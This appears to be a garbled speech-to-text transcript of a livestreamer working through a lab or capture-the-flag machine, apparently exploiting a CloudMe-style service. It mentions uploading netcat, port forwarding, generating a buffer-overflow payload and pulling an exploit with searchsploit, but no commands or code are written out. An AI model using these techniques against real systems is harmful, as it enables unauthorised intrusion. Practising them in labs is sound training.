Okay. And then where was that MSF? What is this? Dash B? Upload netcat.exe. Is that where we are? Upload is where Nutcat lives. So we got port forward, we have this is confusing. Oh, buff like buffer overflow. How are they doing this? This is so whack. No, I'm a Linux binary on Kali. Nice. It sends a buffer, so buffer's not oh. Yeah, right? I mean, whoa, that's funny. That's the same IP as me. How convenient. And I use the -v payload. To set the output payload variable name so I can just paste it into the script. What? And we gotta change buff with payload. What? See this? It just doesn't like this. Maybe it makes sense to include the oh man, this doesn't make any sense. Payload in the script by default looks to be the output. Why doesn't that want to run? That just doesn't work. That's so disappointing. I mean, report forwarding too. Why does it not want to? Search what my cloud. There's really none in cloud. Search cloud name. Which one do we want to use? Buffer overflow, bro. Alright, what do we do? Search exploit -m. Oh, fuck. Yeah. looked like it wanted to run. Apparently not, though. This is just silly. Why is this giving me such a hard time? Passenger side. Alright. Jeez. Alright, I'm gonna call it for now. I'm gonna go grab some lunch. I don't know why this wasn't working though. It's frustrating. But we got user at least. I'll have to look into that. Probably just gonna watch the IPSec video for lunch. Yes, but I'm planning on being on later. So I'm believing this is gonna be a see you later, not a goodbye. With that being said, so I don't take up any longer, peace. I will see y'all soon. Happy Monday. Have a day.